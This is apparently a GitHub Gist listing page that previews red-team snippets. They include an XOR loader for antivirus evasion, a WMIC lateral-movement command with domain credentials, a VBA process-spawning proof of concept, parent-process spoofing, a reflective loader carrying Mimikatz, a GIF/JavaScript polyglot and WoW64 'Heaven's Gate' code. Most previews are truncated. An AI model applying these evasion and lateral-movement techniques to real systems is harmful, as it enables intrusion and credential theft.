Skip to content

Instantly share code, notes, and snippets.

@Arno0x
Arno0x / NetLoader.cs
Last active October 12, 2023 23:19
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader
This partial rewrite of @Flangvik Netloader includes the following changes:
- Allow loading of an XOR encrypted binary to bypass antiviruses
To encrypt the initial binary you can use my Python transformFile.py script.
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
@G0ldenGunSec
G0ldenGunSec / wmicLateralMovement.txt
Created December 11, 2019 14:55
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
@xpn
xpn / PCMPBNMBAO_x86_poc.vba
Created October 26, 2019 23:31
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
@Ridter
Ridter / GetSystem.ps1
Created May 17, 2018 07:32
PowerShell GetSystem => Test for MITRE ATT&CK T 1134
<#
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
#>
#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator
@xorrior
xorrior / PELoader.cs
Created July 12, 2017 01:54
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@ajinabraham
ajinabraham / gifjs.asm
Last active November 16, 2023 07:20
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@Cr4sh
Cr4sh / WoW64_call.cpp
Created May 22, 2014 19:33
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33